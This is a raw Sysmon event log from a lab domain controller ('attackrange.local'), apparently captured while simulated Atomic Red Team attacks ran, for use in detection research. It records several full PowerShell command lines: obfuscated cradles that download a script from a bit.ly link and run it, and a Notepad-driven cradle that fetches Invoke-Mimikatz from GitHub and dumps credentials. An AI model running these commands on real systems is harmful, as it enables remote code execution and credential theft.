ll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203298Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.648{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203297Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203296Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203295Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.627{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=A79B2BA47C73401205D92093173213E1,SHA256=7FB66C8D3A4C9E0BA51E0A3C28C7B2088766CA2ABB8204F695EDB467550581C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203294Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.596{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3C0D9681A001E394FB5A1D799195BF3C,SHA256=B0C833077DCAD54DAFAF461E4F34FD1A18A43FF8DE989F07E9A9359BF07224C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203293Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.565{5ABCFE62-E9B9-6040-464E-00000000AD01}4448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203292Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6733E88681F2B7C90D3B9656F75745F6,SHA256=3AFA11268020CA5111E83ADFE39B787349C3E582F070CE3F13F3B640A8DB55EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203291Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.127{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC9B071F60A29A0AEB34860A6BE6323C,SHA256=A5D09C936172D5822F5EE6C6405F5096B8772AB62F97E0E57FF7570DDC9F1E44,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203290Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.901{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60704-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002203289Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.901{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60704-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 10341000x80000000000000002203355Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.909{5ABCFE62-842F-603E-1500-00000000AD01}11042192C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203354Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.815{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203353Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.815{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203352Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.784{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203351Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.784{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203350Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:07:59.768{5ABCFE62-E9BF-6040-484E-00000000AD01}6020\PSHost.132593404797113421.6020.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203349Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.752{5ABCFE62-E9BF-6040-484E-00000000AD01}6020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3zbucbth.je4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203348Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.752{5ABCFE62-E9BF-6040-484E-00000000AD01}6020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_0iezp3wy.4q5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203347Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.752{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_0iezp3wy.4q5.ps12021-03-04 14:07:59.752 10341000x80000000000000002203346Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.737{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203345Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203344Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203343Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203342Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203341Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203340Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203339Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203338Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203337Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.711{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr} 